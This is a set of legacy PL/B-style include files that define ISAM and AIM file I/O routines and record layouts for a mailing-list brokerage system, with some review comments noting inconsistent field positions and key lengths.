...............................................
. ENTRY POINT : NMDCCKEY
. REQUIRED : 'NMDCCFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NMDCCKEY BRANCH NMDCCFlag TO NMDCC1
          CALL NMDCCOpen
NMDCC1    FILEPI 1;NMDCCFile
          READ NMDCCFile,NMDCCFld;NMDCCVars
          RETURN
..............................................................................
.
. ENTRY POINT : NMDCCTST
. REQUIRED : NMDCCFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
.Reads into STR1 (scratch) so the NMDCCVars record is left untouched.
NMDCCTST BRANCH NMDCCFlag TO NMDCC2
          CALL NMDCCOpen
NMDCC2    FILEPI 1;NMDCCFile
          READ NMDCCFile,NMDCCFld;STR1
          RETURN
..............................................................................
.
. ENTRY POINT : NMDCCKS
. REQUIRED :
. RETURNED : NMDCC Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
NMDCCKS  BRANCH NMDCCFlag TO NMDCC3
          CALL NMDCCOpen
NMDCC3    FILEPI 1;NMDCCFile
          READKS NMDCCFile;NMDCCVars
          RETURN
..............................................................................
. ENTRY POINT : NMDCCSEQ
. REQUIRED :
. RETURNED : NMDCC Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NMDCCSEQ BRANCH NMDCCFlag TO NMDCC4
          CALL NMDCCOpen
NMDCC4    FILEPI 1;NMDCCFile
          READ NMDCCFile,SEQ;NMDCCVars
          RETURN
..............................................................................
.
. ENTRY POINT : NMDCCWRT
. REQUIRED : 'NMDCCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
.Write goes through the file LIST so all indexes stay in step.
NMDCCWRT BRANCH NMDCCFlag TO NMDCC5
          CALL NMDCCOpen
NMDCC5    FILEPI 1;NMDCCFlist
          WRITE NMDCCFLIST;NMDCCVars
          RETURN
..............................................................................
.
. ENTRY POINT : NMDCCUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
NMDCCUPD BRANCH NMDCCFlag TO NMDCC6
          CALL NMDCCOpen
NMDCC6
          FILEPI 1;NMDCCFList
          UPDATE NMDCCFList;NMDCCVars
          RETURN
..............................................................................
.
. ENTRY POINT : NMDCCDEL
. REQUIRED : 'NMDCCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NMDCCDEL BRANCH NMDCCFlag TO NMDCC7
          CALL NMDCCOpen
NMDCC7    FILEPI 1;NMDCCFList
          DELETE NMDCCFList
          RETURN
..............................................................................
.
. ENTRY POINT : NMDCCOpen
. REQUIRED : 'NMDCCFlag' 'NMDCCPATH'
. RETURNED : 'NMDCCFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NMDCCOpen TRAP NMDCCGONE giving error IF IO
          OPEN NMDCCFList
          TRAPCLR IO
          MOVE C1 TO NMDCCFlag
          RETURN
..............................................................................
.If the open fails, hand the file name to the common FILEGONE error routine.
NMDCCGONE MOVE NMDCCNAME TO FILENAME
          CALL FILEGONE
.
..............................................................................
<file_sep>/include/NMLGIO.INC
..............................................................................
.NMLGKEY - exact ISAM key read; key in NMLGFLD, record returned in the
.NMLGKEY/NMLGFIL/NMLGCAT fields (note the entry label and the first record
.field share the name NMLGKEY).
NMLGKEY BRANCH NMLGFLAG TO NMLG1
         CALL NMLGOPEN
NMLG1    FILEPI 1;NMLGFILE
         READ NMLGFILE,NMLGFLD;NMLGKEY:
         NMLGFIL:
         NMLGCAT
         RETURN
..............................................................................
.NMLGTST - test key only; reads into STR1 scratch, record fields untouched.
NMLGTST BRANCH NMLGFLAG TO NMLG2
         CALL NMLGOPEN
NMLG2    FILEPI 1;NMLGFILE
         READ NMLGFILE,NMLGFLD;STR1
         RETURN
..............................................................................
.NMLGKS - key-sequential read (next record in key order).
NMLGKS  BRANCH NMLGFLAG TO NMLG3
         CALL NMLGOPEN
NMLG3    FILEPI 1;NMLGFILE
         READKS NMLGFILE;NMLGKEY:
         NMLGFIL:
         NMLGCAT
         RETURN
..............................................................................
.NMLGSEQ - physical-sequential read.
NMLGSEQ BRANCH NMLGFLAG TO NMLG4
         CALL NMLGOPEN
NMLG4    FILEPI 1;NMLGFILE
         READ NMLGFILE,SEQ;NMLGKEY:
         NMLGFIL:
         NMLGCAT
         RETURN
..............................................................................
.NMLGWRT - keyed insert of the three record fields under key NMLGFLD.
NMLGWRT BRANCH NMLGFLAG TO NMLG5
         CALL NMLGOPEN
NMLG5    FILEPI 1;NMLGFILE
         WRITE NMLGFILE,NMLGFLD;NMLGKEY:
         NMLGFIL:
         NMLGCAT
         RETURN
..............................................................................
.NMLGDEL - keyed delete by NMLGFLD.
NMLGDEL BRANCH NMLGFLAG TO NMLG7
         CALL NMLGOPEN
NMLG7    FILEPI 1;NMLGFILE
         DELETE NMLGFILE,NMLGFLD
         RETURN
..............................................................................
.NMLGOPEN - open on first use; sets NMLGFLAG to 1 so later entries skip it.
NMLGOPEN TRAP NMLGGONE IF IO
         OPEN NMLGFILE,NMLGNAME
         TRAPCLR IO
         MOVE C1 TO NMLGFLAG
         RETURN
..............................................................................
.NMLGGONE - open failed: report via the common FILEGONE routine.
NMLGGONE MOVE NMLGNAME TO FILENAME
         CALL FILEGONE
..............................................................................
<file_sep>/include/SRDSxSLTdd.inc
******************************************************
* SRDSxSLTDD INCLUSION
* SUBSIDIARY FILE FOR DATACARD
* ADDRESSING FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS SRDSx FILE.
* ****************************************************
.
. FILE: NISRDSxSLT
. LENGTH: 60 (was documented as 51; record fields below span 1-60, FIXED=60)
. TYPE: ISAM,MANAGED
. INDEX KEY: 1-30 SRDSxSLT (was documented 1-6; KEYLEN=30 below)
......................................................
.NOTE(review): SRDSxSLTNAME ("SRDSx_SLT.ISI") and the Filelist Name
.("SRDSxSLT.isi") disagree -- confirm which spelling the file server has.
SRDSxSLTNAME INIT "SRDSx_SLT.ISI|NINS1:502"
SRDSxSLTFLIST FILELIST
SRDSxSLTFILE IFILE KEYLEN=30,FIXED=60,Name="SRDSxSLT.isi|NINS1:502"
FILELISTEND
.
SRDSxSLTLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
SRDSxSLTFLD DIM 30 .key work field (matches KEYLEN=30)
SRDSxSLTFLAG FORM 1 .set to 1 once the file list has been opened
SRDSxSLTPATH FORM 1
.
.60-byte record: select description (key) + standard description.
SRDSxSLTVARS LIST
SRDSxSLT DIM 30 1-30 SRDS Select Desc
SRDSxSLTDESC DIM 30 31-60 NIN Standard SELECTION CODE DESCRIPTION
LISTEND
<file_sep>/DEVELOP/datadesigner/datadesigner.ini
mru1 F:\Dev\P\CMS\calendar.ddd
mru2 F:\Dev\P\CMS\calendar.ddd
mru3 F:\Dev\P\CMS\calendar.ddd
mru4 F:\Dev\P\CMS\calendar.ddd
mru5 F:\Dev\P\CMS\calendar.ddd
<file_sep>/include/SRDSLOdd.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: XML from SRDS if there is not a hit
. on our system they get put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 13 April 2011 DLH New
......................................................
.
.SRDS list-owner/manager master: ISI by 6-byte owner number plus an AIM
.file keyed on the company name (SRDSLOfld2, 58 bytes).
SRDSLOFlist Filelist
SrdsLOfIle IFile fixed=500,NoDup,Name="SRDS_Own.isi|NINS1:502"
SrdsLOfile2 AFile fixed=500,Name="SRDS_Own.aam|NINS1:502"
FilelistEnd
SRDSLONAME Init "SRDS_Own|NINS1:502"
SRDSLOFLAG FORM 1
SRDSLOPATH FORM 1
SRDSLOLock FORM 1
SRDSLOFLd Dim 6 .isi key work field (owner number)
SRDSLOfld2 Dim 58 .aim key
.owner / manager file
SRDSLOVARS LIST
SRDSONUM DIM 6 1-6 .SRDS owner NUMBER. **KEY**
SRDSCOMP DIM 55 7-61 .*******Required*******
SRDSADDR DIM 35 62-96
SRDSADDR2 DIM 35 97-131
SRDSCITY DIM 30 132-161 .CITY.
SRDSSTATE DIM 2 162-163 .STATE..MAY NEED TO INCREASE FOR USE IN FOREIGN COUNTRY STATES
SRDSZIP DIM 10 164-173 .ZIP..MAY NEED TO INCREASE FOR USE IN FOREIGN COUNTRY
SRDSCNTRY DIM 15 174-188 .MAY NEED TO INCREASE FOR USE IN FOREIGN COUNTRY
.MANY OF THE NEWER POST SOVIET COUNTRIES ARE IN THE 99* AREA, SO GO TO 4 BYTES
SRDSCNTRYCDE DIM 4 189-192 .country code for phone/fax default = 1
.MAY NEED TO INCREASE FOLLOWING 3 FIELDS FOR USE IN FOREIGN COUNTRY
.Do other countries have longer phone number lengths?
SRDSLOPHONE RECORD 193-202 .Phone Number
SRDSLOPHONE1 DIM 3
SRDSLOPHONE2 DIM 3
SRDSLOPHONE3 DIM 4
REcordEnd
SRDSLOFAX REcord 203-212 .Fax Number **********Required*************
SRDSLOfax1 DIM 3
SRDSLOfax2 DIM 3
SRDSLOfax3 DIM 4
REcordend
SRDSLOACCTFAX DIM 10 213-222 .Accounting fax Number
SRDSLOEMAIL DIM 50 223-272 .Corporate Email Address (Generic)
SRDSLOFTP DIM 50 273-322 .Company's FTP site ("SRDSanies" here looked like a Comp->SRDS replace artifact)
SRDSLOType Dim 2 323-324
SRDSOFIll Dim 176 325-500
Listend
<file_sep>/include/nord8io.inc
;..............................................................................
;
; NORD8IO INCLUSION
; NIN RECORD 'NEW RECORD' IO INCLUSION
;
; FILE NAME : NINORD8
;
;
;.............................................................................
;
NORD8KEY
; Exact ISAM key read: key in NORD8FLD, record returned in ORD8VARS.
; NORD8lock selects locking: 1 = FILEPI, 2 = record lock (READLK),
; 3 = no lock; a value of 0 falls through the BRANCH to the FILEPI path.
; FIX: was "BRANCH NORD8FLAG OF NORD81" -- 'OF' is not the branch keyword;
; every sibling routine in this include uses "BRANCH ... TO ...".
          BRANCH NORD8FLAG TO NORD81
          CALL NORD8OPEN
NORD81
          TRAP IOMssg Giving Error if IO
          branch NORD8lock to NOR81L,NOR81R,NOR81N
NOR81L
          FILEPI 1;NORD8FILE
          READ NORD8FILE,NORD8FLD;ORD8VARS
          TRAPCLR IO
          RETURN
NOR81R
          READLK NORD8FILE,NORD8FLD;ORD8VARS
          TRAPCLR IO
          RETURN
NOR81N
          READ NORD8FILE,NORD8FLD;ORD8VARS
          TRAPCLR IO
          RETURN
;.............................................................................
;
; ENTRY POINT : NORD8TST
; REQUIRED : NORD8FLD
; RETURNED :
; DESCRIPTION : TEST KEY
; (reads into ";;" -- record discarded; only the I/O flags are of interest)
;
NORD8TST
          BRANCH NORD8FLAG TO NORD82
          CALL NORD8OPEN
NORD82
          TRAP IOMssg Giving Error if IO
          branch NORD8lock to NOR82L,NOR82R,NOR82N
NOR82L
          FILEPI 1;NORD8FILE
          READ NORD8FILE,NORD8FLD;;
          TRAPCLR IO
          RETURN
NOR82R
          READLK NORD8FILE,NORD8FLD;;
          TRAPCLR IO
          RETURN
NOR82N
          READ NORD8FILE,NORD8FLD;;
          TRAPCLR IO
          RETURN
;.............................................................................
;
; ENTRY POINT : NORD8KS
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
;
NORD8KS
          BRANCH NORD8FLAG TO NORD83
          CALL NORD8OPEN
NORD83
          TRAP IOMssg Giving Error if IO
          branch NORD8lock to NOR83L,NOR83R,NOR83N
NOR83L
          FILEPI 1;NORD8FILE
          READKS NORD8FILE;ORD8VARS
          TRAPCLR IO
          RETURN
NOR83R
          READKSLK NORD8FILE;ORD8VARS
          TRAPCLR IO
          RETURN
NOR83N
          READKS NORD8FILE;ORD8VARS
          TRAPCLR IO
          RETURN
;.............................................................................
;
; ENTRY POINT : NORD8SEQ
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
; APPLICATION'S RESPONSIBILITY TO TEST FLAGS
;
NORD8SEQ
          BRANCH NORD8FLAG TO NORD84
          CALL NORD8OPEN
NORD84
          TRAP IOMssg Giving Error if IO
          branch NORD8lock to NOR84L,NOR84R,NOR84N
NOR84L
          FILEPI 1;NORD8FILE
          READ NORD8FILE,SEQ;ORD8VARS
          TRAPCLR IO
          RETURN
NOR84R
          READLK NORD8FILE,SEQ;ORD8VARS
          TRAPCLR IO
          RETURN
NOR84N
          READ NORD8FILE,SEQ;ORD8VARS
          TRAPCLR IO
          RETURN
;.............................................................................
;
; ENTRY POINT : NORD8WRT
; REQUIRED : 'NORD8FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
; (writes through the file LIST so index and aim files stay in step)
;
NORD8WRT
          BRANCH NORD8FLAG TO NORD85
          CALL NORD8OPEN
NORD85
          TRAP IOMssg Giving Error if IO
          FILEPI 1;NORD8FLIST
          WRITE NORD8FLIST;ORD8VARS
          trapclr IO
          RETURN
;.............................................................................
;
; ENTRY POINT : NORD8UPD
; REQUIRED : A PREVIOUS KEY READ
; RETURNED :
; DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
;
NORD8UPD
          BRANCH NORD8FLAG TO NORD86
          CALL NORD8OPEN
NORD86
          TRAP IOMssg Giving Error if IO
          FILEPI 1;NORD8FLIST
          UPDATE NORD8FLIST;ORD8VARS
          trapclr IO
          RETURN
;.............................................................................
;
; ENTRY POINT : NORD8DEL
; REQUIRED : 'NORD8FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
;
NORD8DEL
          BRANCH NORD8FLAG TO NORD87
          CALL NORD8OPEN
NORD87
          TRAP IOMssg Giving Error if IO
          FILEPI 1;NORD8FLIST
          DELETE NORD8FLIST
          trapclr IO
          RETURN
..............................................................................
. ENTRY POINT : NORD8AIM
. REQUIRED : NORD8FLD1,NORD8FLD2
. RETURNED : RECORD
. DESCRIPTION : AIM FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORD8AIM
          BRANCH NORD8FLAG,NORD88
          CALL NORD8OPEN
NORD88
          trap IOMssg giving Error if IO
          READ NORD8FLE2,NORD8FLD1,NORD8FLD2;ORD8VARS
          trapclr IO
          RETURN
..............................................................................
.
. ENTRY POINT : NORD8KG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : RECORD
. DESCRIPTION : AIM KEY GENERIC FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORD8KG
          BRANCH NORD8FLAG,NORD89
          CALL NORD8OPEN
NORD89
          trap IOMssg giving Error if IO
          READKG NORD8FLE2;ORD8VARS
          trapclr IO
          RETURN
;...............................................................................
;
; ENTRY POINT : NORD8OPEN
; REQUIRED : 'NORD8FLAG'
; RETURNED : 'NORD8FLAG' SET TO '1' IF OPENED
; DESCRIPTION : OPEN NIN RECORD NUMBER FILE
; DISPLAY ERROR AND ABORT IF NOT ON-LINE.
;
NORD8OPEN
          TRAP NORD8GONE IF IO
          OPEN NORD8FLIST
          TRAPCLR IO
          MOVE C1 TO NORD8FLAG
          RETURN
;
NORD8GONE MOVE NORD8NAME TO FILENAME
          CALL FILEGONE
;
;.............................................................................<file_sep>/include/NADJCLDD.inc
; Last change: JD 28 Aug 1999 9:53 am
..............................................................................
.
. NADJCLDD INCLUSION
. NIN ADJUSTMENT COMPUTATION DATA DEFINITIONS
.
..............................................................................
.
.Adjusted-amount accumulators used by the adjustment computation code.
ARJ FORM 10.2 ADJUSTED A/R
AP1J FORM 10.2 ADJUSTED A/P1
AP2J FORM 10.2 ADJUSTED A/P2
APJ FORM 10.2 ADJUSTED TOTAL AP
LRINCJ FORM 10.2 ADJUSTED LRINC
CTAXJ FORM 7.2 ADJUSTED CITY TAX
STAXJ FORM 7.2 ADJUSTED STATE TAX
TAXESJ FORM 7.2 ADJUSTED TOTAL TAXES
.
.Minus-overpunch conversion work fields: MPCHANGE maps each overpunch
.character ("}JKLMNOPQR") to its digit for sign decoding.
CVTFLD DIM 13 WORK FIELD USED FOR MP CONVERSION.
MPCHARS INIT "}JKLMNOPQR" VALID MINUS OVERPUNCH CHARACTERS
NUM10 FORM 10 NUMERIC WORK FIELD FOR CONVERSION.
MPCHANGE INIT "}0J1K2L3M4N5O6P7Q8R9"
NUM102 FORM 10.2 RETURNED NUMERIC FIELD W/DOL.CENT CONVERTED.
<file_sep>/include/nshp3dd.inc
..............................................................................
.
. NSHP3DD INCLUSION
. NIN Inventory FILE DEFINITION
.
. FILE NAME : NINSHP3
. REC LENGTH: 336 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
..............................................................................
.
.Inventory (list received) file: one 336-byte record per LR number.
NSHP3FLIST Filelist
NSHP3FILE IFILE KEYLEN=6,FIXED=336,Name="NINSHP3.ISI|NINS1:502 "
FILELISTEND
NSHP3NAME INIT "NINSHP3.ISI|NINS1:502"
NSHP3FLD DIM 6 .key work field (LR number)
NSHP3FLAG FORM 1
NSHP3lock form 1 0 OR 1=filepi,2=recordlock, 3=no lock.
.
.NOTE(review): position comments below do not quite add up -- Comments
.032-286 overlaps DQTY 024-032, and the DIM sizes total 337 vs FIXED=336.
.Presumably Comments is really 033-287; confirm against the live file.
NSHP3VARS list
NSHP3LR DIM 6 001-006 LR Number
NSHP3RQTY DIM 9 007-015 Received Qty
NSHP3Date DIM 8 016-023 List Received Date
NSHP3DQTY DIM 9 024-032 Declared Qty (The quantity the list owner stated was available)
NSHP3Comments DIM 255 032-286 Comments
NSHP3FILLER DIM 50 287-336 Filler
listend
..............................................................................
<file_sep>/include/GNXTDD.INC
..............................................................................
.
. get next INCLUSION
. gnxt FILE DEFINITION
.
. FILE NAME : GNXT
. REC LENGTH: 14 FIXED
. INDEX KEY : 1-8 (1-1 CO DESIGNATION, 2-4 'FILE DESCRIPTOR' 5-7 'NXT')
.
..............................................................................
.
.Next-number file: 8-byte key (company + file tag + "NXT"), 6-byte counter.
GNXTFILE IFILE KEYLEN=8,FIXED=14,UNCOMP,Name="Gnxt.ISI|NINS1:502"
GNXTNAME INIT "GNXT.ISI|NINS1:502"
GNXTFLD DIM 8
GNXTFLAG FORM 1
* ....................................................
.
GNXTKEY DIM 8 1-8 1-1 COMPANY 'N'
. 2-4 FILE IE 'ORD'
. 5-7 NXT
. EXCEPT NINPI DATACARD LOCK.
GNXTNUM DIM 6 9-14 NEXT NUMBER TO BE USED.
...............................................................................
<file_sep>/include/tncbakdd.inc
..............................................................................
.
. TNCBAKDD INCLUSION
. NIN BROKER NOTES FILE DEFINITION
.
. FILE NAME : TNCBACK
. REC LENGTH: 103
. INDEX KEY : 1 - 25
.
.File Created 8/15/03
..............................................................................
.
.Broker notes backup file: 25-byte source key + package desc + two 6.2
.forms (9 bytes each) = 103 bytes, matching the header above.
TNCBAKFILE IFILE KEYLEN=25
TNCBAKNAME INIT "TNCBACK.ISI"
TNCBAKFLD DIM 25
TNCBAKFLAG FORM 1
TNCBAKlock form 1 0 or 1 - filepi, 2 = record locking, 3 = no locks
..............................................................................
TNCBAKVARS list
TNCBAKSOURCEKEY dim 25
TNCBAKPKGDESC dim 60
;TNCBAKCONST INIT " 0.70"
TNCBAKCONST form 6.2
TNCBAKCOST form 6.2
listend
tncbakCOSTCONST INIT "0.70" .default cost constant (see TNCBAKCONST)
<file_sep>/include/NDatCntdd.inc
..............................................................................
.
. NdatCntDD INCLUSION
. NIN Dat/Min contactFILE DEFINITION
.
. FILE NAME : NINdatCnt
. REC LENGTH: 120 FIXED
. INDEX KEY : 2-6 (List #)
. AIM KEY : 30-546
..26Oct2006 New
..............................................................................
.
.NOTE(review): several declarations here disagree with the header and with
.each other -- IFILE KEYLEN=4 vs the 6-byte key field/work field, the
."AIM KEY : 30-546" header vs a 120-byte record (contact is 30-54), the
.28-byte aim work field vs the 25-byte contact field, and Phn 7-18 (12
.positions) for an 11-byte DIM. Confirm against the live file before use.
NdatCntNAME INIT "NINdatCnt.dat|NINS1:502"
NdatCntFLD DIM 6
NDatCntFList Filelist
NdatCntFLE1 IFILE KEYLEN=4,FIXED=120,Name="NINdatCnt.isi|NINS1:502"
NdatCntFLE2 AFILE FIXED=120,Name="NINdatCnt.AAM|NINS1:502"
filelistend
NdatCntFLD2 DIM 28
NdatCntFLaG FORM 1
NdatCntPATH FORM 1
.
NDatCntvars list
NDatCntNum dim 6 1-6 NIN List # - Key
NdatCntPhn Dim 11 7-18 Manager Phone
NdatCntFax Dim 11 19-29 Manager fax
NDatCnt Dim 25 30-54 Contact - key
NDatCntEml Dim 50 55-104
NDatCntFill Dim 16 105-120 not used
listend
..............................................................................*
<file_sep>/include/Batchio.inc
...............................................................................
..
.. BatchIO INCLUSION
.. NIN Batch FILE I/O ROUTINES
..
...............................................................................
..
.. ENTRY POINT : BatchKEY
.. REQUIRED : 'BatchFLD'
.. RETURNED : Contact RECORD
.. DESCRIPTION : EXACT ISAM KEY READ
.. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
..
..NOTE(review): unlike nord8io.inc, the Batch read routines never TRAPCLR IO
..after a successful read, so the IOMssg trap stays armed -- confirm intended.
..BatchLOCK selects locking in each routine: 1 = FILEPI, 2 = record lock,
..3 = no lock (0 falls through the BRANCH to the FILEPI path).
BatchKEY
          BRANCH BatchFLAG,Batch1
          CALL BatchOPEN
Batch1
          TRAP IOMssg Giving Error if IO
          BRANCH BatchLOCK,Batch1L,Batch1R,Batch1N
Batch1L
          FILEPI 1;BatchFILE
          READ BatchFILE,BatchFLD;BatchVARS
          RETURN
Batch1R
          READLK BatchFILE,BatchFLD;BatchVARS
          RETURN
Batch1N
          READ BatchFILE,BatchFLD;BatchVARS
          RETURN
.. ENTRY POINT : BatchKEY2
.. REQUIRED : 'BatchFLD'
.. RETURNED : Contact RECORD
.. DESCRIPTION : EXACT ISAM KEY READ (secondary index, key BatchFLD4)
.. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
BatchKEY2
          BRANCH BatchFLAG,Batch2
          CALL BatchOPEN
Batch2
          TRAP IOMssg Giving Error if IO
          BRANCH BatchLOCK,Batch2l,Batch2r,Batch2n
Batch2L
          FILEPI 1;BatchFILE2
          READ BatchFILE2,BatchFLD4;BatchVARS
          RETURN
Batch2R
          READLK BatchFILE2,BatchFLD4;BatchVARS
          RETURN
Batch2N
          READ BatchFILE2,BatchFLD4;BatchVARS
          RETURN
...............................................................................
..
.. ENTRY POINT : BatchTST
.. REQUIRED : BatchFLD
.. RETURNED :
.. DESCRIPTION : TEST KEY (";;" discards the record)
..
BatchTST
          BRANCH BatchFLAG,Batch2T
          CALL BatchOPEN
Batch2T
          TRAP IOMssg Giving Error if IO
          BRANCH BatchLOCK,Batch2LT,Batch2RT,Batch2NT
Batch2LT
          FILEPI 1;BatchFILE
          READ BatchFILE,BatchFLD;;
          RETURN
Batch2RT
          READLK BatchFILE,BatchFLD;;
          RETURN
Batch2NT
          READ BatchFILE,BatchFLD;;
          RETURN
.patchdb
...............................................................................
..
.. ENTRY POINT : BatchTST2
.. REQUIRED : BatchFLD
.. RETURNED :
.. DESCRIPTION : TEST KEY
..
BatchTST2
.. Test-key variant of BatchKEY2: probes the secondary index BatchFile2 by
.. key BatchFLD4 without returning a record (";;" discards it).
.. BatchLOCK: 1 = FILEPI, 2 = READLK, 3 = plain read (0 falls through).
          BRANCH BatchFLAG,Batch2T2
          CALL BatchOPEN
Batch2T2
          TRAP IOMssg Giving Error if IO
          BRANCH BatchLOCK,Batch2LT2,Batch2RT2,Batch2NT2
Batch2LT2
.. FIX: was "FILEPI 1;BatchFILE" -- locked the primary file while reading
.. BatchFile2; BatchKEY2's FILEPI variant correctly locks BatchFILE2.
          FILEPI 1;BatchFILE2
          READ BatchFile2,BatchFLD4;;
          RETURN
Batch2RT2
          READLK BatchFile2,BatchFLD4;;
          RETURN
Batch2NT2
          READ BatchFile2,BatchFLD4;;
          RETURN
...............................................................................
...............................................................................
..
.. ENTRY POINT : BatchKS
.. REQUIRED :
.. RETURNED : Contact RECORD
.. DESCRIPTION : KEY SEQUENTIAL Contact FILE READ
..
BatchKS
          BRANCH BatchFLAG,Batch3
          CALL BatchOPEN
Batch3
          TRAP IOMssg Giving Error if IO
          BRANCH BatchLOCK,Batch3L,Batch3R,Batch3N
Batch3L
          FILEPI 1;BatchFILE
          READKS BatchFILE;BatchVARS
          RETURN
Batch3R
          READKSLK BatchFILE;BatchVARS
          RETURN
Batch3N
          READKS BatchFILE;BatchVARS
          RETURN
...............................................................................
.. ENTRY POINT : BatchSEQ
.. REQUIRED :
.. RETURNED : Contact RECORD
.. DESCRIPTION : SEQUENTIAL Contact FILE READ
.. APPLICATION'S RESPONSIBILITY TO TEST FLGS
..
BatchSEQ
          BRANCH BatchFLAG,Batch4
          CALL BatchOPEN
Batch4
          TRAP IOMssg Giving Error if IO
          BRANCH BatchLOCK,Batch4L,Batch4R,Batch4N
Batch4L
          FILEPI 1;BatchFILE
          READ BatchFILE,SEQ;BatchVARS
          RETURN
Batch4r
          READLK BatchFILE,SEQ;BatchVARS
          RETURN
Batch4N
          READ BatchFILE,SEQ;BatchVARS
          RETURN
...............................................................................
..
.. ENTRY POINT : BatchWRT
.. REQUIRED : 'BatchFLD'
.. RETURNED :
.. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.. (writes through the file LIST so all indexes stay in step)
..
BatchWRT
          BRANCH BatchFLAG,Batch5
          CALL BatchOPEN
Batch5
          TRAP IOMssg Giving Error if IO
          FILEPI 1;BatchFLIST
          WRITE BatchFLIST;BatchVARS
          RETURN
...............................................................................
..
.. ENTRY POINT : BatchUPD
.. REQUIRED : A PREVIOUS KEY READ
.. RETURNED :
.. DESCRIPTION : KEY UPDATE Contact FILE
..
BatchUPD
          BRANCH BatchFLAG,Batch6
          CALL BatchOPEN
Batch6
          TRAP IOMssg Giving Error if IO
          FILEPI 1;BatchFLIST
          UPDATE BatchFLIST;BatchVARS
          RETURN
...............................................................................
..
.. ENTRY POINT : BatchDEL
.. REQUIRED : 'BatchFLD'
.. RETURNED :
.. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
..
BatchDEL
          BRANCH BatchFLAG,Batch7
          CALL BatchOPEN
Batch7
          TRAP IOMssg Giving Error if IO
          FILEPI 1;BatchFLIST
          DELETE BatchFLIST
          RETURN
..............................................................................
...............................................................................
..
.. ENTRY POINT : BatchOPEN
.. REQUIRED : 'BatchFLAG' 'BatchPATH'
.. RETURNED : 'BatchFLAG' SET TO '1' IF OPENED
.. DESCRIPTION : OPEN NIN Contact FILE
.. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
..
BatchOPEN
          TRAP BatchGONE IF IO
          OPEN BatchFLIST
          TRAPCLR IO
          MOVE C1,BatchFLAG
          RETURN
...............................................................................
..If the open fails, hand the file name to the common FILEGONE error routine.
BatchGONE
          MOVE BatchNAME,FILENAME
          CALL FILEGONE
..
...............................................................................
<file_sep>/include/ndatwdd.inc
******************************************************
* DATACARD WEB FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS DATACARD WEB FILE.
* KEEPS TRACK OF FILES CURRENTLY LOADED ON OUR WEBSITE
* DYNAMICALLY REFRESHED WEEKLY BY NDAT002W.PLS
* ****************************************************
.
. FILE: NINDATW
. LENGTH: 20 (was documented 6; FIXED=20 below -- 6-byte key + 14 filler)
. COMPRESS: SPACE
. TYPE: ISAM,MANAGED
. INDEX KEY: 1-6
......................................................
......................................................
NDATWNAME DIM 8
NDATWNME1 INIT "NINDATW "
.
NDATWFLIST FILELIST
NDATWFILE IFILE KEYLEN=6,FIXED=20,Name="NINDATW.ISI|NINS1:502"
FILELISTEND
NDATWLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NDATWFLD DIM 6
NDATWFLAG FORM 1
NDATWPATH FORM 1
.
NDATWVARS LIST
NDATWLST DIM 6 1-6 ZERO FILLED KEY.
NDATWFILL DIM 14 7-20 FILLER.
LISTEND
<file_sep>/include/nmobdd.inc
.NMOBDD.INC CREATED 06MAY92
.17mar94 added brknum
.12may94 added new file by brk/mlr
* *****************************************************************************
.
. FILE: NINMOB - BALANCE RECORD FILE.
. LENGTH: 21
.COMPRESS: NONE
. TYPE: ISAM
. KEYS: 1) MLR,
. KEYS: 2) broker/mlr number
...............................................................................
.Balance file: primary index by 4-byte mailer number (duplicates allowed),
.secondary index by 8-byte broker+mailer (no duplicates).
NMOBFILE IFILE KEYLEN=4,FIXED=21,dup
NMOBFLE2 IFILE KEYLEN=8,FIXED=21,NoDup
NMOBNAME INIT "NINMOB "
.START PATCH 01/20/2005 ASH REPLACED LOGIC
.NMOBNME1 INIT "\\NINS1\e\data\index\NINMOB"
.NMOBNME2 INIT "\\NINS1\e\data\index\NINMOB2"
NMOBNME1 INIT "NINMOB|NINS1:502 "
NMOBNME2 INIT "NINMOB2|NINS1:502 "
.END PATCH 01/20/2005 ASH REPLACED LOGIC
NMOBFLAG FORM 1
NMObFLG2 FORM 1
NMObpath FORM 1
nmobfld dim 4 .key work field for the primary (mailer) index
NmobMsgFlag Dim 1 if "N" suppress io messages See Nmobio.inc
NmobOkFlag Dim 1 Ninv0001 can set to yes so if No $ and trying code 96 - we return gracefully
Code96Ok Dim 1 see above
...............................................................................
.BALANCE RECORD
...............
